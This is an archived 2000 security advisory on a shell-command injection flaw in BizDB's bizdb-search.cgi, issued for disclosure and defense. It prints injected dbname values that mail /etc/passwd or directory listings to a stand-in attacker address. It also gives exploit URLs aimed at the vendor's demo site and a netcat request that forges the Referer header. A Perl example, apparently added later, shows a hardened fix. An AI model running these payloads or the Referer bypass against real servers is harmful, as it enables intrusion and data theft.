BWL-00-04.txt
Posted Dec 7, 2000
Authored by Black Watch Labs | Site perfectotech.com

Black Watch Labs Security Advisory #00-04 (April 6, 2000) - BizDB is a database and search engine software by Cnctek. Part of the installation is a CGI script, "bizdb-search.cgi", which is used to search the bizdb database. This script is vulnerable to modification of its parameter in such a way that it runs user-provided shell commands on the server. Exploit URLs included. These issues have been resolved in newer versions of this software, so make sure to upgrade!

tags | shell, cgi
SHA-256 | 24a4ed5c6abb15a3bce91a5494875ecada0d11f6a7bde42b93605a2e1bbe0bd7

Vendor response: The security bugs have been fixed in all more recent versions of this software. Upgrade!

Black Watch Lab - Vulnerabilities

Black Watch Labs ID: BWL-00-04

BizDB Search Script Enables Shell Command Execution at the Server
Black Watch Labs Security Advisory #00-04 (April 06, 2000)
Name:
BizDB Search Script Enables Shell Command Execution at the Server
Black Watch Labs ID:
BWL-00-04
Date Released:
April 6, 2000
Category:
Application (HTML) - parameter modification
Products affected:
BizDB
Number of affected sites/pages/users:
We assume up to a thousand pages utilize BizDB
Summary:
BizDB is a database and search engine software by Cnctek. Part of the installation is a CGI script, bizdb-search.cgi,
which is used to search the bizdb database. This script is vulnerable to modification of its parameter in such a way
that it runs user-provided shell commands on the server.
Analysis:
The bizdb-search.cgi script is probably a Perl script which calls open without protection or input sanity checks. The
open call is used to open the database whose name appears in the user input. As a result, an attacker can change this
parameter and take advantage of the piping feature of open, so that instead of the original database file name, say
bizdb, the attacker sends ; ... exploit commands ...|, such as:
;cat%20/etc/passwd|mail%20attacker@evil.site|
in order to send the contents of the /etc/passwd file (assuming a UNIX server) to the attacker's email account. The
script optionally checks that the HTTP_REFERER field holds some specific value (that of the referring page), but this
field can easily be forged if the request is generated by a raw TCP/IP client (such as netcat, and perhaps even
telnet), by sending the raw GET request line (GET url HTTP/1.0) followed by a Referer line (Referer: page), where the
page is the one in which the form was found.
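The defect described above is the classic two-argument Perl open, which treats a filename ending in "|" as a command pipeline. The following is an added example written for this advisory, not BizDB's own code: it places the unsafe pattern beside a hardened version that validates the dbname parameter against an allowlist, builds the path from a fixed directory, and uses three-argument open with an explicit read mode. The database directory, the allowlist contents, the ".db" suffix and the inline query-string parser are assumptions.

```perl
#!/usr/bin/perl
# Added example (not BizDB's code): two-argument open() versus a hardened
# allowlisted three-argument open(). Paths and names below are assumed.
use strict;
use warnings;

# Constructed allowlist: the only databases the CGI may open.
my %ALLOWED_DB = map { ($_ => 1) } qw(bizdb bizdb1);
my $DB_DIR = '/var/lib/bizdb';   # assumed location of the database files

# Vulnerable pattern (do not use): two-argument open() interprets magic
# characters in $name, so a value ending in '|' is executed as a command
# pipeline instead of being opened as a file.
sub open_db_unsafe {
    my ($name) = @_;
    open(DB, $name) or return undef;
    return \*DB;
}

# Hardened replacement: allowlist the name, derive the path from a constant
# directory, and use three-argument open() with an explicit '<' mode so the
# name can never be interpreted as a pipe or a mode prefix.
sub open_db_safe {
    my ($name) = @_;
    return (undef, "missing dbname") unless defined $name && length $name;
    return (undef, "dbname not in allowlist") unless $ALLOWED_DB{$name};
    # Defence in depth: even allowlisted values must be plain identifiers.
    return (undef, "dbname contains invalid characters")
        unless $name =~ /\A[A-Za-z0-9_-]+\z/;
    my $path = "$DB_DIR/$name.db";
    open(my $fh, '<', $path) or return (undef, "cannot open $path: $!");
    return ($fh, undef);
}

# Minimal query-string parser for one parameter (CGI.pm would normally do
# this; kept inline so the example is self-contained).
sub param_from_query {
    my ($query, $wanted) = @_;
    for my $pair (split /&/, $query) {
        my ($k, $v) = split /=/, $pair, 2;
        next unless defined $k && $k eq $wanted;
        $v = '' unless defined $v;
        $v =~ tr/+/ /;                                 # form encoding of space
        $v =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;     # URL-decode
        return $v;
    }
    return undef;
}

# Constructed requests: a legitimate search and the hostile shape from the
# advisory. Only the first passes the allowlist.
for my $qs ('template=bizdb-summary&dbname=bizdb&f6=^a.*',
            'template=bizdb-summary&dbname=;ls|&f6=^a.*') {
    my $name = param_from_query($qs, 'dbname');
    my ($fh, $err) = open_db_safe($name);
    if ($fh) { print "opened database '$name'\n"; close $fh; }
    else     { print "rejected dbname '$name': $err\n"; }
}
```

The allowlist is what actually closes the hole; the character-class check and the three-argument open are layered behind it so that a future change to the allowlist cannot silently reopen it. Note that nothing here consults HTTP_REFERER: that header is supplied by the client and, as the analysis above points out, is no substitute for validating the parameter itself.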
Exploits:
The demonstration area provided by Cnctek has a link that searches for all companies in the database whose name starts
with A. This link is
http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=bizdb&f6=^a.*&action=searchdbdisplay
(this link does not work as it does not contain the referrer, which is why netcat must be used to exploit the
vulnerability).
If an attacker changes the dbname parameter into:
;ls|mail%20attacker@evil.site|
and sends the modified request:
http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20attacker@evil.site|&f6=^a.*&action=searchdbdisplay
the results of the ls command will be sent to the attacker's email account. The arguments for the netcat command should
be www.cnctek.com 80, and the exact lines for the netcat input (i.e. the HTTP request) are:
GET /cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20attacker@evil.site|&f6=^a.*&action=searchdbdisplay HTTP/1.0
Host: www.cnctek.com
Referer: http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?bizdb-search
(empty line)
(End of Input)
Vendor Status:
The vendor was contacted, but does not seem to understand the nature of the problem. In their reply, they claim that
there exists a mechanism that prevents the exploit. We strongly suspect they refer to ensuring that the HTTP_REFERER
environment variable matches the referring page in the site. Again, this provides no extra security, as it can be
easily bypassed by forging the HTTP request.
Vendor Patch or workaround:
No patch or workaround available at the time of this release.

References and Links:
CNCTek: http://www.cnctek.com/
BizDB section: http://www.cnctek.com/bizdb-html/
BizDB demonstration: http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?bizdb-search
About Black Watch Labs (www.perfectotech.com/blackwatchlabs/)
Black Watch Labs is a research group operated by Perfecto Technologies Inc., the leader in Web Application Security
Management. Black Watch Labs was established in order to further the knowledge of the Internet community in the arena
of Web application security management. Black Watch Labs publishes security advisories regularly, which are maintained
at http://www.perfectotech.com/blackwatchlabs/, and are also posted to relevant security lists and Web sites. Black
Watch Labs also operates a Web application security mailing list, which can be subscribed to at
http://www.perfectotech.com/blackwatchlabs/. For more info about Black Watch Labs and Web Application Security
Management, please call (408) 855-9500 or email BlackWatchLabs@perfectotech.com.

About Perfecto Technologies (http://www.perfectotech.com/)
Founded in 1997 and headquartered in Santa Clara, Calif., Perfecto Technologies is the leader in Web Application
Security Management software. AppShield(TM), Perfecto's flagship product, is the first to provide automatic Web site
security, enabling companies to realize faster time to market while meeting the demand for privacy and security. Black
Watch Labs was established to further the knowledge of Web application security within the Internet security
community. Privately held, Perfecto is funded by blue-chip venture capital firms and industry leaders, including
Goldman Sachs, Intel Corporation, Sequoia Capital, The Sprout Group and Walden Israel. More information about Perfecto
Technologies may be obtained by visiting the Company's Web site at www.perfectotech.com or by calling the Company
directly at (408) 855-9500.
Copyright © 1997-2000 Perfecto Technologies LTD. All rights reserved.
Permission is hereby granted to reproduce and distribute the application security alerts herein in their entirety,
provided the information, this notice and all other Perfecto Technologies marks remain intact.
Specific Limitations on Use of the Black Watch Labs Advisories
THIS ADVISORY INCLUDES INFORMATION WHICH WILL ILLUSTRATE CERTAIN SECURITY RISKS AND ISSUES ASSOCIATED WITH SITES ON
THE INTERNET, INCLUDING, POTENTIALLY, YOUR SITE. YOU AGREE THAT YOUR VIEWING OF THIS ADVISORY IS SOLELY FOR THE
PURPOSES OF UNDERSTANDING THESE RISKS AND ISSUES WITH RESPECT TO YOUR SITE AND THE PRODUCTS AND SERVICES OFFERED BY
PERFECTO TECHNOLOGIES. YOU AGREE NOT TO USE ANY INFORMATION DISCLOSED TO YOU FOR ANY IMPROPER OR ILLEGAL PURPOSE,
INCLUDING TO VIOLATE THE SECURITY OF ANY OTHER PERSON'S SITE. YOU ARE EXPLICITLY WARNED THAT THE USE FOR ANY IMPROPER
PURPOSE OF INFORMATION DISCLOSED TO YOU COULD SUBJECT YOU TO CIVIL AND CRIMINAL LIABILITY IN THE UNITED STATES AND
OTHER COUNTRIES.
NO WARRANTY
Any material furnished by Perfecto Technologies is furnished on an "as is" basis and may change without notice.
Perfecto Technologies makes no warranties of any kind, either expressed or implied as to any matter including but not
limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use
of the material. Neither does Perfecto Technologies make any warranty of any kind with respect to freedom from patent,
trademark or copyright infringement. In no event shall Perfecto Technologies be liable for any damages whatsoever
arising out of or in connection with the use or spread of this information. Any use of this information is at the
user's own risk.